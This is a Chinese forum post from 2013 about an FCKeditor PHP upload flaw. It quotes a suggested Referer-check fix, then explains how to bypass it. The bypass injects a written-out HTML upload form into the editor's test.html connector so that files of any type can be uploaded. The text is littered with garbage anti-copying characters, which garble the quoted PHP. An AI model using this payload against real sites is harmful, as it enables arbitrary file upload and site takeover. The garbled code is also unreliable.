漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
0 }9 D5 M2 }8 m$ A. J" x4 p: A网上给出的修复方案是2 _% k8 ~% h- o Y* M
修复方法,删除FCK编辑器用其他的编辑器9 X+ h- ~" X" ~6 ]% u! g( b
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
c9 f1 I+ T& T2 n& N在( F9 P& P: X" k- H$ X/ j7 u, ]
require(‘config.php’);
' j* E/ A! j+ i# G# o( V, p. V) Prequire(‘util.php’);
+ h0 V( t$ ]! J5 H# k4 j的下面添加以下代码—————————–
% }8 t% }5 v7 j6 G5 M//防止外部提交
7 B, R0 W2 D* R$ z# S5 H& ufunction outsidepost()
2 B6 [0 z$ r+ N- E{
2 m1 V! s# q) `3 _$servername=$_SERVER['SERVER_NAME'];: q0 s- |/ R9 I/ o( m
$sub_from=@$_SERVER['HTTP_REFERER'];
& F# c6 `% r( e2 O$sub_len=strlen($servername);. f: e, Q1 q) L9 ]6 K: L; t* H# H
$checkfrom=substr($sub_from,7,$sub_len);; V: N# A5 s/ f# u+ J% s
if($checkfrom!=$servername){" Z5 c$ {4 p8 E. \
echo(“you don’t outsidepost!”);* ]0 W$ j7 d+ _4 ?" S" \6 O
exit;7 x; j* } n: I1 k& s% j# d
}
0 `- z2 v) e. D# }5 v9 E% ]$ `: z# |4 S}
. D( _+ C2 U9 N1 ? ^/ ~9 H. G4 Eoutsidepost();
3 W; d. j* J% W( X# F+ X0 x' k9 l防止外部提交,但是没有防止内部提交,
2 F" j! x4 ^% `' g3 S利用方法:( V* M. J) Q+ k5 r8 D6 U
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
( A. C& D8 c4 s2 }. H" A% t2,在Current Folder 框输入0 X; Y0 H' D; L0 G8 @# v/ q {
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
i0 j5 `& g7 f) ~9 s然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。# E- b, v! H. ?
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对